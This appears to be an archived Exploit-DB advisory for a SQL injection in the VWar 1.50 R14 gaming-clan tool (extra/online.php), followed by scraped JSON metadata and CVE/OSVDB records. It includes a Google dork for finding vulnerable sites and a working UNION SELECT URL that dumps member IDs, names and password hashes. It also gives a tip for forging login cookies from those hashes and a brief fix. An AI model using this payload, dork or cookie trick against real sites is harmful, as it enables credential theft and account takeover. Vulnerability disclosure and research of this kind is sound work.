ID EDB-ID:2170
Type exploitdb
Reporter brOmstar
Modified 2006-08-10T00:00:00
Description
VWar <= 1.50 R14 (online.php) Remote SQL Injection Vulnerability. CVE-2006-4142,CVE-2007-2312. Webapps exploit for php platform
.:[ insecurity research team ]:.
.__..____.:.______.____.:.____ .
.:. | |/ \:/ ___// __ \:/ _\.:.
: | | | \\____\\ ___/\ /__ :. .
..: |__|___| /____ >\___ >\___ >.:
.:.. .. .\/ .:\/:. .\/. .:\/:
. ...:. .advisory. .:...
:..................: 1o.o8.2oo6 ..
Affected Application: VWar <= v1.50 R14
. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
Discoverd by: brOmstar
Team: Insecurity Research Team
URL: http://www.insecurityresearch.org
E-Mail: brom0815@gmx.de
. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
Typ: Remote [x] Local [ ]
Remote File Inclusion [ ] SQL Injection [x]
Level: Low [ ] Middle [ ] High [x]
Application: VWar
Version: <= v1.50 R14
Vulnerable File: extra/online.php
Vulnerable Variable: n
URL: http://www.vwar.de
Description: Virtual War is a tool for gaming clans.
Dork: intext:"Powered by: Virtual War v1.5.0"
. . :[ code snippet ]: . . . . . . . . . . . . . . . . . . . . . . . . .
line 63: $query = $vwardb->query("
line 64: SELECT memberid, name, lastactivity
line 65: FROM vwar".$n."_member WHERE lastactivity > ".(time() -
$onlinetime * 60)."
line 66: ");
. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
example: if you want a list of userid/username/password's try this:
http://www.vwar.de/demo/extra/online.php?n=_member%20WHERE%20memberid=-999%20UNION%20SELECT%200,CONCAT(memberid,0x3A,name,0x3A,password),2%20FROM%20vwar_member%20%20/*
encrypt the md5-password again with md5 and throw it in a cookie... :-)
. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
o1.) open extra/online.php
o2.) take a look at the following lines:
41: if( !defined ("VWAR_COMMON_INCLUDED") )
42: {
43: $vwar_root = $vwar_xroot;
44: require_once ( $vwar_root . "includes/functions_common.php" );
45: }
o3.) add between line 44 and 45 this:
require_once ( $vwar_root . "includes/_config.inc.php" );
o4.) done!
. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
buzzdee, camino and my lovely, sexy girlfriend!
# milw0rm.com [2006-08-10]
{"id": "EDB-ID:2170", "hash": "6b692e72475b7c5d80e05f86bc2b4cf7", "type": "exploitdb", "bulletinFamily": "exploit", "title": "VWar <= 1.50 R14 online.php Remote SQL Injection Vulnerability", "description": "VWar <= 1.50 R14 (online.php) Remote SQL Injection Vulnerability. CVE-2006-4142,CVE-2007-2312. Webapps exploit for php platform", "published": "2006-08-10T00:00:00", "modified": "2006-08-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/2170/", "reporter": "brOmstar", "references": [], "cvelist": ["CVE-2007-2312", "CVE-2006-4142"], "lastseen": "2016-01-31T15:40:35", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-2312", "CVE-2006-4142"]}, {"type": "osvdb", "idList": ["OSVDB:29193", "OSVDB:36575", "OSVDB:39366"]}], "modified": "2016-01-31T15:40:35"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/2170/", "sourceData": " .:[ insecurity research team ]:.\n .__..____.:.______.____.:.____ .\n .:. | |/ \\:/ ___// __ \\:/ _\\.:.\n : | | | \\\\____\\\\ ___/\\ /__ :. .\n ..: |__|___| /____ >\\___ >\\___ >.:\n .:.. .. .\\/ .:\\/:. .\\/. .:\\/:\n . ...:. .advisory. .:...\n :..................: 1o.o8.2oo6 ..\n \n \n Affected Application: VWar <= v1.50 R14\n \n \n . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .\n \n \n Discoverd by: brOmstar\n \n Team: Insecurity Research Team\n \n URL: http://www.insecurityresearch.org\n \n E-Mail: brom0815@gmx.de\n \n \n \n . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .\n \n \n Typ: Remote [x] Local [ ]\n \n Remote File Inclusion [ ] SQL Injection [x]\n \n Level: Low [ ] Middle [ ] High [x]\n \n Application: VWar\n \n Version: <= v1.50 R14\n \n Vulnerable File: extra/online.php\n\n Vulnerable Variable: n\n \n URL: http://www.vwar.de\n \n Description: Virtual War is a tool for gaming clans.\n \n Dork: intext:\"Powered by: Virtual War v1.5.0\"\n\n\n\n . . :[ code snippet ]: . . . . . . . . . . . . . . . . . . . . . . . . .\n\n\n line 63: $query = $vwardb->query(\"\n\n line 64:\tSELECT memberid, name, lastactivity\n\n line 65:\tFROM vwar\".$n.\"_member WHERE lastactivity > \".(time() - \n\n $onlinetime * 60).\"\n\n line 66: \");\n\n \n\n . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .\n \n\n example: if you want a list of userid/username/password's try this:\n\n\n http://www.vwar.de/demo/extra/online.php?n=_member%20WHERE%20memberid=-999%20UNION%20SELECT%200,CONCAT(memberid,0x3A,name,0x3A,password),2%20FROM%20vwar_member%20%20/*\n \n \n encrypt the md5-password again with md5 and throw it in a cookie... :-)\n \n\n\n . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .\n \n \n o1.) open extra/online.php\n \n o2.) take a look at the following lines:\n\n 41: if( !defined (\"VWAR_COMMON_INCLUDED\") )\n \t\n 42: {\n\n 43: $vwar_root = $vwar_xroot;\n\n 44: require_once ( $vwar_root . \"includes/functions_common.php\" );\n\n 45: }\n \n o3.) add between line 44 and 45 this:\n\n require_once ( $vwar_root . \"includes/_config.inc.php\" );\n \n o4.) done!\n \n \n \n . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n \n \n buzzdee, camino and my lovely, sexy girlfriend!\n\n# milw0rm.com [2006-08-10]\n", "osvdbidlist": ["29193"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2018-10-18T15:06:09", "bulletinFamily": "NVD", "description": "Multiple SQL injection vulnerabilities in the Virtual War (VWar) 1.5.0 R15 module for PHP-Nuke allow remote attackers to execute arbitrary SQL commands via the n parameter to extra/online.php and other unspecified scripts in extra/. NOTE: this might be same vulnerability as CVE-2006-4142; however, there is an intervening vendor fix announcement.", "modified": "2018-10-16T12:43:09", "published": "2007-04-26T17:19:00", "id": "CVE-2007-2312", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2312", "title": "CVE-2007-2312", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-18T15:05:37", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in extra/online.php in Virtual War (VWar) 1.5.0 R14 and earlier allows remote attackers to execute arbitrary SQL commands via the n parameter.", "modified": "2018-10-17T17:33:39", "published": "2006-08-14T19:04:00", "id": "CVE-2006-4142", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4142", "title": "CVE-2006-4142", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:25", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.vwar.de/\n[Related OSVDB ID: 1016244](https://vulners.com/osvdb/OSVDB:1016244)\n[Related OSVDB ID: 1018217](https://vulners.com/osvdb/OSVDB:1018217)\nOther Advisory URL: http://securityreason.com/securityalert/2642\nOther Advisory URL: http://www.waraxe.us/advisory-48.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0211.html\nMail List Post: http://www.attrition.org/pipermail/vim/2007-April/001519.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0239.html\nISS X-Force ID: 33649\nISS X-Force ID: 28323\n[CVE-2006-4142](https://vulners.com/cve/CVE-2006-4142)\n[CVE-2007-2312](https://vulners.com/cve/CVE-2007-2312)\nBugtraq ID: 19472\nBugtraq ID: 23478\n", "modified": "2006-08-11T05:24:13", "published": "2006-08-11T05:24:13", "href": "https://vulners.com/osvdb/OSVDB:29193", "id": "OSVDB:29193", "title": "Virtual War (Vwar) extra/online.php n Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.vwar.de/\n[Secunia Advisory ID:24887](https://secuniaresearch.flexerasoftware.com/advisories/24887/)\n[Related OSVDB ID: 36574](https://vulners.com/osvdb/OSVDB:36574)\nOther Advisory URL: http://securityreason.com/securityalert/2642\nOther Advisory URL: http://www.waraxe.us/advisory-48.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0211.html\nKeyword: waraxe-2007-SA#048\nISS X-Force ID: 33649\n[CVE-2007-2312](https://vulners.com/cve/CVE-2007-2312)\nBugtraq ID: 23478\n", "modified": "2007-04-13T06:03:58", "published": "2007-04-13T06:03:58", "href": "https://vulners.com/osvdb/OSVDB:36575", "id": "OSVDB:36575", "title": "vWar Module for PHP-Nuke extra/online.php n Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.vwar.de/\n[Related OSVDB ID: 1016244](https://vulners.com/osvdb/OSVDB:1016244)\nOther Advisory URL: http://securityreason.com/securityalert/2642\nOther Advisory URL: http://www.waraxe.us/advisory-48.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0211.html\nMail List Post: http://www.attrition.org/pipermail/vim/2007-April/001519.html\nISS X-Force ID: 33649\n[CVE-2007-2312](https://vulners.com/cve/CVE-2007-2312)\nBugtraq ID: 23478\n", "modified": "2007-04-13T03:12:46", "published": "2007-04-13T03:12:46", "href": "https://vulners.com/osvdb/OSVDB:39366", "id": "OSVDB:39366", "title": "Virtual War (VWar) extra/ Directory Multiple Unspecified Scripts SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}